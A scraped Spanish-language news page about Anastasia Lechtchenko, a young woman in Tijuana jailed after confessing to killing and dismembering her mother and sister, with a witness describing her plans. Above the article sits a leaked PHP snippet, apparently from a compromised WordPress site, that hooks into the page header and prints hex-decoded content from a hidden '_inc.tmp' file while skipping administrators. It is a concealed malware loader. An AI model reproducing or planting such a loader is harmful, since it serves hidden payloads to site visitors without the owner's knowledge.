if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Anastasia Lechtchenko recibe formal prisión – Reporte Noreste
Conéctate con nosotros

Tijuana, Baja California.- Seguirá presa en la penitenciaría de La Mesa, la joven Anastasia Lechtchenko, de origen ruso que confesó haber asesinado y desmembrado a su madre y su hermana menor, esperando una condena de hasta 80 años.

Inicialmente la joven confesó que había asesinado a sus familiares, pero fue dejada en libertad por una juez en Tijuana, para después volver a ser detenida, y en esta ocasión Anastasia sostuvo que fue abusada sexualmente y torturada por la policía ministerial obligada a dar declaraciones.

Pero en la audiencia celebrada en el Juzgado Quinto Penal, Yesenia Estrada Ávila, amiga de Anastasia relató como la chica planeaba incinerar los cadáveres desmembrados de su madre y hermana, y conseguir una pistola para asesinar a su padre, Igor, y suicidarse posteriormente. Así como el video donde confiesa el delito.

 

Con información de: SDPnoticas.com

Fotografía: Internet

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Nal / Int